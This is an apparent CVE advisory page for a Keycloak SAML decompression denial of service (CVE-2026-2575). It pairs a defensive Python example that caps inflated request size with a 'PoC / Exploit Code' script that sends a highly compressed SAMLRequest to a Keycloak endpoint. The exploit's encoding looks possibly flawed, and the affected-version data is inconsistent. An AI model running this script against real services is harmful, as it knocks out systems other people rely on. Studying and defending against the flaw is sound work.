Security Vulnerability Report
CVE-2026-2575 CVSS 5.3 MEDIUM

CVE-2026-2575

Published: 2026-03-18 04:17:17
Last Modified: 2026-03-18 14:52:44

Description

A flaw was found in Keycloak. An unauthenticated remote attacker can trigger an application level Denial of Service (DoS) by sending a highly compressed SAMLRequest through the SAML Redirect Binding. The server fails to enforce size limits during DEFLATE decompression, leading to an OutOfMemoryError (OOM) and subsequent process termination. This vulnerability allows an attacker to disrupt the availability of the service.
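The defensive counterpart to the flaw described above, as an added example that is not Keycloak's code: a Redirect Binding decoder that inflates the SAMLRequest in bounded pieces and rejects it as soon as the output passes a fixed cap, instead of handing the whole stream to a one-shot decompressor. The cap values, the encoder helper and the sample requests are constructed for this example.

```python
import base64
import zlib

# Caps sized to the largest legitimate AuthnRequest expected; constructed for this example, not Keycloak settings.
MAX_COMPRESSED_BYTES = 16 * 1024   # the SAMLRequest query parameter as received
MAX_INFLATED_BYTES = 64 * 1024     # the XML after DEFLATE inflation
CHUNK = 8 * 1024                   # output granularity at which the cap is re-checked


class SamlRequestTooLarge(ValueError):
    """Raised when a SAMLRequest exceeds the compressed or inflated cap."""


def encode_saml_redirect(xml: bytes) -> str:
    """Redirect Binding encoding as an SP produces it: raw DEFLATE (RFC 1951), then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # wbits=-15: raw DEFLATE, no zlib header
    return base64.b64encode(comp.compress(xml) + comp.flush()).decode("ascii")


def inflate_saml_redirect(saml_request_b64: str, limit: int = MAX_INFLATED_BYTES) -> bytes:
    """Decode a Redirect Binding SAMLRequest with a hard cap on the inflated size.

    The unbounded form, zlib.decompress(raw, -15), materialises the whole output before any
    check can run. Here output is pulled in CHUNK-sized pieces and the request is rejected
    as soon as the running total passes the limit, so memory stays near limit + CHUNK.
    """
    raw = base64.b64decode(saml_request_b64, validate=True)
    if len(raw) > MAX_COMPRESSED_BYTES:
        raise SamlRequestTooLarge(f"compressed SAMLRequest is {len(raw)} bytes")
    d = zlib.decompressobj(wbits=-15)
    out = bytearray()
    buf = raw
    while True:
        piece = d.decompress(buf, CHUNK)  # emits at most CHUNK bytes per call
        out += piece
        if len(out) > limit:
            raise SamlRequestTooLarge(f"inflated SAMLRequest exceeds {limit} bytes")
        buf = d.unconsumed_tail           # input held back because the output cap was hit
        if d.eof or (not buf and not piece):
            break
    if not d.eof:
        raise ValueError("truncated DEFLATE stream in SAMLRequest")
    return bytes(out)


def inflation_ratio(saml_request_b64: str) -> float:
    """Inflated/compressed byte ratio of an accepted request, worth logging as a detection signal."""
    raw = base64.b64decode(saml_request_b64, validate=True)
    return len(inflate_saml_redirect(saml_request_b64)) / max(len(raw), 1)
```

Because the check runs per chunk, memory consumption is bounded by the cap rather than by how well the attacker's input compresses, which is the property the unbounded decompression in the affected versions lacks.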

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Keycloak < 25.0.0
Keycloak < 24.0.5
Keycloak < 23.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64
import zlib
import requests
import time

# Generate highly compressed SAMLRequest for DoS attack
def generate_compressed_saml_request():
    # Create a SAMLRequest with repeated patterns to achieve high compression ratio
    # Using DEFLATE compression which allows extreme compression with repeated data
    large_data = '<samlp:AuthnRequest' + 'A' * 100000 + '</samlp:AuthnRequest>' * 100
    compressed = zlib.compress(large_data.encode(), level=9)
    encoded = base64.b64encode(compressed).decode()
    return encoded

# Target Keycloak SAML endpoint
TARGET_URL = 'https://vulnerable-keycloak.com/auth/realms/{realm}/protocol/saml'
REALM = 'your-realm'

def exploit():
    compressed_request = generate_compressed_saml_request()
    params = {'SAMLRequest': compressed_request}
    print(f'[*] Sending compressed SAMLRequest to {TARGET_URL}')
    print(f'[*] Compressed size: {len(compressed_request)} bytes')
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10, verify=False)
        print(f'[*] Response status: {response.status_code}')
    except requests.exceptions.RequestException as e:
        print(f'[!] Request failed: {e}')

if __name__ == '__main__':
    exploit()

References

https://access.redhat.com/errata/RHSA-2026:3947
https://access.redhat.com/errata/RHSA-2026:3948
https://access.redhat.com/security/cve/CVE-2026-2575
https://bugzilla.redhat.com/show_bug.cgi?id=2440149

Raw JSON Data (flattened)

The record, flattened from JSON into the same field layout used above.

CVE ID
CVE-2026-2575
Source Identifier
[email protected] (address obfuscated in the source page)
Published
2026-03-18T04:17:16.783
Last Modified
2026-03-18T14:52:44.227
Vulnerability Status
Awaiting Analysis
Weakness (Primary)
CWE-409
Description
English text identical to the Description section above; the record also carries a Spanish translation of the same text.
CVSS v3.1 (Primary)
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L, base score 5.3, severity MEDIUM
Attack Vector NETWORK, Attack Complexity LOW, Privileges Required NONE, User Interaction NONE, Scope UNCHANGED
Confidentiality Impact NONE, Integrity Impact NONE, Availability Impact LOW
Exploitability Score 3.9, Impact Score 1.4
Reference Source
[email protected] for all four URLs listed under References above